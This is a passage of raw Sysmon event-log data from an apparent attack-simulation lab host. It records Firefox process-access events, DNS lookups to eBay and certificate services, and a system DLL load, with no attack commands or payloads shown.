14:00:16.160{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017428Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.148{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017427Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.148{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017426Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.148{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017425Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.148{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017424Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.147{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017423Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.129{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017422Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.129{59A5CD1D-945A-6005-3305-00000000A301}70527132C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37129|C:\Program Files\Mozilla Firefox\firefox.exe+36bd7|C:\Program Files\Mozilla Firefox\firefox.exe+4d780|C:\Program Files\Mozilla Firefox\firefox.exe+4d47c|C:\Windows\SYSTEM32\ntdll.dll+7f06d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14ead42|C:\Program Files\Mozilla Firefox\xul.dll+14c8bb3|C:\Program Files\Mozilla Firefox\xul.dll+16115fd|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561 10341000x800000000000000017484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.709{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.708{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 734700x800000000000000017481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.634{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\System32\svchost.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 22542200x800000000000000017480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.615{59A5CD1D-945A-6005-3305-00000000A301}7052pages.ebay.com0type: 5 epage.g.ebay.com;::ffff:209.140.148.240;::ffff:216.113.179.36;::ffff:216.113.181.254;::ffff:209.140.144.108;::ffff:209.140.146.171;::ffff:209.140.148.12;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.400{59A5CD1D-945A-6005-3305-00000000A301}7052rover.ebay.de0type: 5 slot9428.ebay.com.edgekey.net;type: 5 e9428.a.akamaiedge.net;::ffff:104.75.89.51;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.319{59A5CD1D-945A-6005-3305-00000000A301}7052safebrowsing.googleapis.com02a00:1450:4001:800::200a;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.313{59A5CD1D-945A-6005-3305-00000000A301}7052safebrowsing.googleapis.com0142.250.74.202;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.312{59A5CD1D-945A-6005-3305-00000000A301}7052safebrowsing.googleapis.com0::ffff:142.250.74.202;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.103{59A5CD1D-945A-6005-3305-00000000A301}7052rover.intl.g.ebay.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.093{59A5CD1D-945A-6005-3305-00000000A301}7052rover.intl.g.ebay.com0209.140.129.51;209.140.129.66;209.140.129.82;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017473Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.092{59A5CD1D-945A-6005-3305-00000000A301}7052rover.ebay.com0type: 5 rover.ebaycdn.net;type: 5 rover.intl.g.ebay.com;::ffff:209.140.129.82;::ffff:209.140.129.51;::ffff:209.140.129.66;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017472Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.081{59A5CD1D-945A-6005-3305-00000000A301}7052cs950197015.wpc.systemcdn.net02606:2800:233:73a0:db44:eb2:3cfa:f2e5;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017471Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.047{59A5CD1D-945A-6005-3305-00000000A301}7052ebayimg.map.fastly.net02a04:4e42:1b::718;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017470Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.044{59A5CD1D-945A-6005-3305-00000000A301}7052ebayimg.map.fastly.net0151.101.114.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017469Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.043{59A5CD1D-945A-6005-3305-00000000A301}7052i.ebayimg.com0type: 5 images.ebaycdn.net;type: 5 ebayimg.map.fastly.net;::ffff:151.101.114.206;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:17.089{59A5CD1D-8E56-6005-2E00-00000000A301}2464155.23.199.152.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.924{59A5CD1D-8E56-6005-2E00-00000000A301}2464206.114.101.151.in-addr.arpa.9003-C:\Windows\sysmon64.exe 22542200x800000000000000017501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.921{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sectigo.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.920{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sectigo.com0151.139.128.14;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.919{59A5CD1D-8E56-6005-2E00-00000000A301}246451.89.75.104.in-addr.arpa.0type: 12 a104-75-89-51.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.919{59A5CD1D-8E56-6005-2E00-00000000A301}246485.89.79.104.in-addr.arpa.0type: 12 a104-79-89-85.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 22542200x800000000000000017497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.919{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.sectigo.com0::ffff:151.139.128.14;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.626{59A5CD1D-945A-6005-3305-00000000A301}7052epage.g.ebay.com9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:16.616{59A5CD1D-945A-6005-3305-00000000A301}7052epage.g.ebay.com0216.113.179.36;216.113.181.254;209.140.144.108;209.140.146.171;209.140.148.12;209.140.148.240;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.538{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.538{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 10341000x800000000000000017492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.537{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+327dd8a|C:\Program Files\Mozilla Firefox\xul.dll+327d3d4|C:\Program Files\Mozilla Firefox\xul.dll+328bf18|C:\Program Files\Mozilla Firefox\xul.dll+485b8b|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21 11241100x800000000000000017491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:18.347{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla 